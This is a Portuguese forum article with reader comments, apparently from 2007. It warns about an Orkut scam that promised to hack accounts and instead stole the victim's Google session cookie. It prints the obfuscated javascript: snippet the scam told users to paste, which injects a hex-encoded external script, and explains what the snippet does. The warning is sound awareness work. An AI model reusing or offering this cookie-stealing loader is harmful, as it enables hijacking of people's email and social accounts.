Um certo dia estava eu navegando no orkut e recebi uma mensagem que prometia a invasão de uma conta qualquer do orkut através de um script.
Segundo o autor eu deveria entrar no perfil da pessoa escolhida e colar na barra de endereços esse código:
javascript:d=document.createElement('SCRIPT');
d.src='%68%74%74%70%3A%2F%2F%74%69%6E%79%75%72%6C%2E%63%6F %6D%2F%32%64%6E%6F%6B%32'; document.getElementsByTagName('head').item(0).appendChild(d);void(0)
Só que desconfiado como sou, resolvi fazer o seguinte, não confiar nesse script por ter no seu código hexadecimais que o navegador interpreta como caracteres normais.
Como conheço a codificação hexadecimal, resolvi traduzir esse comando, e para a surpresa de todos menos a minha, esse script faz uma chamada a outro script hospedado em uma página fora do orkut e o resultado final é:
Quando você clica nele está autorizando o script a copiar o cookie do orkut no seu computador para o computador do criador dele, dando a esse camarada acesso total à sua conta no Google... isso mesmo! Estamos falando de acesso total ao Gmail, Orkut, Google reader, etc.
Baseado nessa experiência resolvi criar um script em Java que vai codificar e decodificar as palavras para Hexadecimal e Unicode.
[1] Comentário enviado por
kenshisk em 01/06/2007 - 12:38h:
Ainda não entendo de javascritp então não posso comentar sobre o código mais na minha opinião alguem que executa algum código sem conhecer merece se ferrar, meu como pode executar algo que não conhece?
mais enfim esse art. vai ajudar alguns inocentes.
p.s: não interpretem mal achei bom o artigo.
[2] Comentário enviado por
sclinux em 01/06/2007 - 14:40h:
Parabéns pelo artigo. Muitas vezes caracteres codificados podem ser usados para "burlar" bloqueios efetuados por proxy.
[3] Comentário enviado por
shocker em 03/06/2007 - 13:32h:
Excelente artigo. Parabéns.
[4] Comentário enviado por
evertonrs em 03/06/2007 - 21:15h:
Eu acho que não tem como saber se a pessoa é do bem ou é do mal..
uma coisa é certa, sistemas hexadecimais e unicodes é mto bom..
eu amo essa parte, me interesso mto..
em fim.. mto bom esse script... valew mauricio
[5] Comentário enviado por
TSM em 02/10/2007 - 15:13h:
Cara sua dica vai ser muito util, valeu.
Abraços
[6] Comentário enviado por
Teixeira em 20/10/2007 - 20:11h:
É uma pena que "a meninada" que usa orkut, msn e outros que tais, geralmente não tenha acesso a (ou não se interesse por) artigos como esse e continue a abrir tudo quanto encontra pela frente.
Parabéns. Vou testar.
[7] Comentário enviado por
edphp em 06/02/2009 - 23:36h:
Parabéns pela iniciativa de ajudar pessoas que não sabem muito sobre o que um link pode fazer, ainda aproveitando para explicar coisas básicas sobre informática, mas que usuários mais novos e alguns velhos não conheçem.
Mas como todo ato bom tem sua parte má, pode ser que outas pessoas usem isso, mas creio que o pessoal aqui deve ser gente boa, talvez no máximo a idéia de executar um script ao clicar num link.
Enfeite o LILO com uma imagem de seu gosto
Versão para impressora
Indicar para um amigo
Enviar artigo